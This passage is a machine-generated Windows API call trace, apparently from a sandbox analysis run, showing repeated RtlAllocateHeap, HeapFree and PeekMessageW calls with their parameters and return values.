wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.490] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690600 [0072.490] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0072.490] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a688 [0072.490] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906d0 [0072.490] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0072.491] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b270 [0072.491] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906d0 [0072.491] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0072.491] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a688 | out: hHeap=0x650000) returned 1 [0072.491] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0072.491] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0072.491] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690600 | out: hHeap=0x650000) returned 1 [0072.491] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b270 [0072.491] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a688 [0072.491] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690600 [0072.491] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a688 | out: hHeap=0x650000) returned 1 [0072.491] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690600 | out: hHeap=0x650000) returned 1 [0072.491] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0072.491] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.491] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690600 [0072.491] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0072.491] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b270 [0072.491] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906d0 [0072.491] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0072.491] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a688 [0072.491] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906d0 [0072.491] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0072.491] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0072.491] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a688 | out: hHeap=0x650000) returned 1 [0072.491] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0072.491] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690600 | out: hHeap=0x650000) returned 1 [0072.491] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.491] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.491] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690600 [0072.491] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0072.491] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a688 [0072.491] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906d0 [0072.492] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0072.492] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b270 [0072.492] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906d0 [0072.492] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0072.492] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a688 | out: hHeap=0x650000) returned 1 [0072.492] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0072.492] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0072.492] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690600 | out: hHeap=0x650000) returned 1 [0072.492] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b270 [0072.492] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a688 [0072.492] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690600 [0072.492] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a688 | out: hHeap=0x650000) returned 1 [0072.492] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690600 | out: hHeap=0x650000) returned 1 [0072.492] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0072.492] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.492] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690600 [0072.492] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0072.492] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b270 [0072.492] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906d0 [0072.492] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0072.492] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a688 [0072.492] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906d0 [0072.492] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0072.492] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0072.492] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a688 | out: hHeap=0x650000) returned 1 [0072.492] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0072.492] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690600 | out: hHeap=0x650000) returned 1 [0072.492] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.492] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.492] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690600 [0072.492] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0072.492] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a688 [0072.492] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906d0 [0072.493] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0072.493] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b270 [0072.493] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906d0 [0072.493] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0072.493] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a688 | out: hHeap=0x650000) returned 1 [0072.493] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0072.493] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0072.493] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690600 | out: hHeap=0x650000) returned 1 [0072.493] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b270 [0072.493] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a688 [0072.493] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690600 [0072.493] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a688 | out: hHeap=0x650000) returned 1 [0072.493] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690600 | out: hHeap=0x650000) returned 1 [0072.493] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0072.493] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.493] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690600 [0072.493] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0072.493] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b270 [0072.493] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906d0 [0072.493] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0072.493] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a688 [0072.493] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906d0 [0072.493] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0072.493] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0072.493] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a688 | out: hHeap=0x650000) returned 1 [0072.493] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0072.493] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690600 | out: hHeap=0x650000) returned 1 [0072.493] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.493] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.493] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690600 [0072.493] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0072.493] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a688 [0072.493] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906d0 [0072.494] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0072.494] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b270 [0072.494] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906d0 [0072.494] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0072.494] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a688 | out: hHeap=0x650000) returned 1 [0072.494] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0072.494] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0072.494] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690600 | out: hHeap=0x650000) returned 1 [0072.494] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b270 [0072.494] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a688 [0072.494] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690600 [0072.494] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a688 | out: hHeap=0x650000) returned 1 [0072.494] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690600 | out: hHeap=0x650000) returned 1 [0072.494] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0072.494] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.494] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690600 [0072.494] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0072.494] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b270 [0072.494] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906d0 [0072.494] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0072.494] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a688 [0072.494] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906d0 [0072.494] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0072.494] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0072.494] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a688 | out: hHeap=0x650000) returned 1 [0072.494] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0072.495] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690600 | out: hHeap=0x650000) returned 1 [0072.495] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.495] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.495] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690600 [0072.495] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0072.495] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a688 [0072.495] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906d0 [0072.495] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0072.495] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b270 [0072.495] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906d0 [0072.495] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0072.495] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a688 | out: hHeap=0x650000) returned 1 [0072.495] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0072.495] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0072.495] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690600 | out: hHeap=0x650000) returned 1 [0072.495] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b270 [0072.495] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a688 [0072.495] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690600 [0072.495] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a688 | out: hHeap=0x650000) returned 1 [0072.495] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690600 | out: hHeap=0x650000) returned 1 [0072.495] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0072.495] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.495] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690600 [0072.495] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0072.495] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b270 [0072.495] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906d0 [0072.495] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0072.495] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a688 [0072.495] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906d0 [0072.496] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0072.496] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0072.496] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a688 | out: hHeap=0x650000) returned 1 [0072.496] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0072.496] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690600 | out: hHeap=0x650000) returned 1 [0072.496] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.496] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.496] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690600 [0072.496] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0072.496] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a688 [0072.496] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906d0 [0072.496] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0072.496] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b270 [0072.496] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906d0 [0072.496] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0072.496] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a688 | out: hHeap=0x650000) returned 1 [0072.496] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0072.496] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0072.496] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690600 | out: hHeap=0x650000) returned 1 [0072.496] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b270 [0072.496] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a688 [0072.496] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690600 [0072.496] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a688 | out: hHeap=0x650000) returned 1 [0072.496] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690600 | out: hHeap=0x650000) returned 1 [0072.496] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0072.496] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.496] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690600 [0072.496] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0072.496] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b270 [0072.496] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906d0 [0072.496] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0072.496] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a688 [0072.497] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906d0 [0072.497] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0072.497] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0072.497] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a688 | out: hHeap=0x650000) returned 1 [0072.497] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0072.497] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690600 | out: hHeap=0x650000) returned 1 [0072.497] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.497] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6c9398 | out: hHeap=0x650000) returned 1 [0072.497] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.497] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6c9358 | out: hHeap=0x650000) returned 1 [0072.497] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.497] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690600 [0072.497] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0072.497] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a688 [0072.497] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906d0 [0072.497] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b270 [0072.497] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0072.497] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b180 [0072.497] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906d0 [0072.497] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a6a0 [0072.497] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0072.497] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x42) returned 0x76f0b0 [0072.497] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906d0 [0072.497] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690590 [0072.497] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x691578 [0072.497] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x84) returned 0x691798 [0072.497] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b228 [0072.497] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a9a0 [0072.497] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a9a0 | out: hHeap=0x650000) returned 1 [0072.497] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a9e8 | out: hHeap=0x650000) returned 1 [0072.497] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aa30 | out: hHeap=0x650000) returned 1 [0072.498] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aa78 | out: hHeap=0x650000) returned 1 [0072.498] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aac0 | out: hHeap=0x650000) returned 1 [0072.498] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab08 | out: hHeap=0x650000) returned 1 [0072.498] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab50 | out: hHeap=0x650000) returned 1 [0072.498] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0072.498] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abe0 | out: hHeap=0x650000) returned 1 [0072.498] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac28 | out: hHeap=0x650000) returned 1 [0072.498] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac70 | out: hHeap=0x650000) returned 1 [0072.498] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.498] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.498] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.498] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.498] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.498] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.498] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.498] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.498] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 